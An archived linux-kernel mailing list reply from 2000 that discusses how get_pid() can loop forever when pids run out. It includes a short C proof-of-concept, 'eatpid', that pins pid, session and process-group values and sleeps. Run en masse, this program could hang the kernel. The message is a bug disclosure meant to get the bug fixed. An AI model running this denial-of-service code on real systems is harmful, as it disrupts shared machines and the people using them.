Russell King wrote:
>
> 1. get_pid() doesn't allocate pids - therefore "out of pid" makes no
> sense.
>
Ok, my mail was ambigious:
get_pid() tries to find a new pid value, and it loops until it has
found a free pid value. No free pid value == "out of pid".
>
> Typically, a processes "session id" will be the pid of another process,
> and the "pgrp id" will be the pid of the first process of the group.
>
I'm not interested in the typical case, it's a DOS attack: an evil user
can block 3 "pid" values with one running thread, and 10.000 of these
threads cause a hard kernel hang.
IMHO we must avoid that: either limit max_thread to MAX_PID/3, or add an
infinite loop protection to get_pid().
-- Manfred
/* * exec.c: simple do_exec bug hunter * * Copyright (C) 1999, 2000 by Manfred Spraul. * * Redistribution of this file is permitted under the terms of the GNU * Public License (GPL) * $Header: /pub/cvs/ms/eatpid/eatpid.c,v 1.1 2000/06/25 11:32:48 manfred Exp $ */
#include <unistd.h> #include <errno.h> #include <stdlib.h> #include <stdio.h> #include <limits.h>
int main() { pid_t p; pid_t x; p = fork(); if(p) exit(0); x = setsid(); printf("setsid(): %d/%d.\n",x, errno); p = fork(); if(p) exit(0); x = setpgid(getpid(),getpid()); printf("setpgid(): %d/%d.\n",x, errno); p = fork(); if(p) exit(0); printf("pid now %d.\n",getpid()); printf("pgrp now %d.\n",getpgrp()); for(;;) sleep(1); }
- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/
This archive was generated by hypermail 2b29 : Mon Jun 26 2000 - 21:00:06 EST